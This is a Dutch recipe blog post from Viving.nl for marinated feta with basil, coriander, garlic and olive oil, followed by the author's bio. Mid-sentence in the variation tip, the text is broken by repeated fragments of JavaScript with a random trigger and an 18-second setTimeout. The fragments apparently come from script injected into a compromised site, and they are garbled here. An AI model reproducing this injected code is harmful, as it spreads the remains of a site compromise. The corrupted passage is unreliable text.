Gemarineerde Feta, wat een heerlijk eenvoudig hapje!

Dit eenvoudige feta hapje doet het echt op elk feestje goed! Ik heb dit hapje ooit een keer in een bruin cafe in Den Haag geproefd. Al proevende hebben we een beetje achterhaald wat er allemaal voor kruiden in zaten en helaas hadden we aan 1 bakje niet genoeg om het echt goed te proeven… wat vervelend! šŸ˜‰

Voor deze gemarineerde fetaĀ heb je eigenlijk vooral heel veel kruiden nodig. Zelf maak ik altijd een mengsel in de hakmolen van de volgende kruiden en specerijen. Om de smaak er echt goed in te laten trekken kun je de feta het beste een paar uur marineren. Goed van te voren voor te bereiden dus als je een feestje hebt!

Wat heb je nodig?

– 1 bos basilicum

– 1 bos koriander

– 2 teentjes knoflook

– Goede extra vergineĀ olijfolie

– zeezout

– Peper

– Korianderzaad

Je kunt om te variƫren ook olijven of zongedroogde dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomaten dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toevoegen, deze combinatie is natuurlijk altijd goed!

Ook lekker bij…

Als je eenmaal wat gemarineerde feta hebt gemaakt kun je hier natuurlijk van alles mee doen. Heerlijk door couscous, pasta of door een salade heen. Het geeft het allemaal gelijk net even iets extra’s.

Heb jij ook een leuke variatietip? Deel deze dan op mijn facebook pagina of laat een berichtje achter onder deze blogpost.

Gemarineerde Feta - Viving.nl

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Gemarineerde Feta, wat een heerlijk eenvoudig hapje!"

    Plaats een reactie:

    Je emailadres wordt niet weergegeven.